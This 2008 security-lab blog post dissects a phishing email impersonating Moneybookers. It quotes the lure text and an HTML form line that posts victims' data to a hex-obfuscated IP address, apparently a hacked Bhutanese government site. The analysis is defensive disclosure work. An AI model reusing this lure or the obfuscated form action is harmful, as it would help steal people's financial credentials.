NEWS FROM THE LAB - Sunday, April 6, 2008

Gone Phishing Posted by Mikko @ 22:28 GMT

Somebody is spamming around mails that look like this:

From "www.moneybookers.com" support@moneybookers.com
Date: Sun, 6 Apr 2008 06:56:47 +0900

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.

�� Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office:
Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.


The attachment is an HTML file, asking the user to participate in a Money Launder Prevention program:


When looking at the source code, we can see that the HTML file loads all the components from moneybookers.com — the real site… but the Form POST function looks funky:

   form method="POST" action="http://0xCA909D9D/HTML/verification.pl.php" style="text-align: left"

Hmmm. 0xCA909D9D. That's a weird way of presenting an IP address.

Lets see where this goes.


But of course. Turns out it's the site of the Anti-corruption commission of Bhutan:


The commission has been informed that they've been hacked.